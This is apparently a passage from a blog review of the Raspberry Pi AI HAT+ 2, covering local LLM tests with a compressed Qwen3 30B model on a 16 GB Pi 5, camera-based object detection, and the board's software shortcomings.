So power holds it back, but it’s the 8 GB of RAM that holds back the LLM use case the most (versus just running on the Pi’s CPU). The Pi 5 can be bought in up to a 16 GB configuration. That’s as much as you get in decent consumer graphics cards.
Because of that, many quantized medium-size models target 10-12 GB of RAM usage (leaving space for context, which eats up another 2+ GB of RAM).
A couple weeks ago, ByteShape got Qwen3 30B A3B Instruct to fit on a 16GB Pi 5. Now this post isn’t about LLMs, but the short of it is they found a novel way to compress the model to fit in 10 GB of RAM.
A little bit of quality is lost, but like a JPEG, it’s still good enough to ace all the contrived tests (like building a TODO list app, or sorting a complex list) that the tiny models I ran on the Hailo 10H didn’t complete well (see the video earlier in this post for details).
To test the 30B model, I installed llama.cpp following this guide from my blog, and downloaded the compressed model.
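If you want to drive the same kind of setup from a script, a minimal sketch is below. It assumes the llama-cpp-python bindings rather than the llama.cpp CLI the post actually uses, and the GGUF filename is a placeholder for whichever compressed Qwen3 build you download.

```python
# Minimal sketch of running a local GGUF model, assuming the llama-cpp-python
# bindings (the post itself drives llama.cpp directly); the model filename is
# a placeholder, not the exact ByteShape build referenced above.
from llama_cpp import Llama

llm = Llama(
    model_path="qwen3-30b-a3b-instruct-compressed.gguf",  # placeholder filename
    n_ctx=4096,     # context window; more context eats more of the 16 GB
    n_threads=4,    # match the Pi 5's four cores
)

result = llm.create_chat_completion(
    messages=[{
        "role": "user",
        "content": "Generate a single-page TODO list app in plain HTML/JS.",
    }],
    max_tokens=2048,
)
print(result["choices"][0]["message"]["content"])
```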
I asked it to generate a single page TODO list app, and it’s still not a speed demon (this is a Pi CPU with LPDDR4x RAM we’re talking about), but after a little while, it gave me this:
It met all my requirements:
* I can type in as many items as I want
* I can drag them around to rearrange them
* I can check off items and they go to the bottom of the list…
It’s honestly crazy how many small tasks you can do even with free local models… even on a Pi. Natural Language Programming was just a dream back when I started my career.
Besides being angry Google, OpenAI, Anthropic and all these other companies are consuming all the world’s money and resources doing this stuff—not to mention destroying the careers of thousands of junior developers—it is kinda neat to see NLP work for very tightly defined examples.
But I don’t think this HAT is the best choice to run local, private LLMs (at least not as a primary goal).
What it is good for, is vision processing. But the original AI HAT was good for that too!
In my testing, Hailo’s hailo-rpi5-examples were not yet updated for this new HAT, and even if I specified the Hailo 10H manually, model files would not load, or I ran into errors once the board was detected.
But Raspberry Pi’s models ran, so I tested them with a Camera Module 3:
I pointed it over at my desk, and it was able to pick out things like my keyboard, my monitor (which it thought was a TV), my phone, and even the mouse tucked away in the back.
It all ran quite fast—and 10x faster than on the Pi’s CPU—but the problem is I can do the same thing with the original AI HAT ($110)—or the AI Camera ($70).
If you just need vision processing, I would stick with one of those.
The headline feature of the AI HAT+ 2 is the ability to run in a ‘mixed’ mode, where it can process machine vision (frames from a camera or video feed), while also running inference (like an LLM or text-to-speech).
Unfortunately, when I tried running two models simultaneously, I ran into segmentation faults or ‘device not ready’, and lacking any working examples from Hailo, I had to give up on getting that working in time for this post.
Just like the original AI HAT, there’s some growing pains.
It seems like with most hardware with “AI” in the name, it’s hardware-first, then software comes later—if it comes at all. At least with Raspberry Pi’s track record, the software does come, it’s just… often the solutions are only useful in tiny niche use cases.
8 GB of RAM is useful, but it’s not quite enough to give this HAT an advantage over just paying for the bigger 16GB Pi with more RAM, which will be more flexible and run models faster.
The main use case for this HAT might be in power-constrained applications where you need both vision processing and inferencing. But even there… it’s hard to say “yes, buy this thing”, because for just a few more watts, the Pi could achieve better performance for inference in tandem with the $70 AI Camera or the $110 AI HAT+ for the vision processing.
Outside of running tiny LLMs in less than 10 watts, maybe the idea is you use the AI HAT+ 2 as a development kit for designing devices using the 10H like self-checkout scanners (which might not even run on a Pi)? I’m not sure.
...
Read the original on www.jeffgeerling.com »
...
Read the original on webtiles.kicya.net »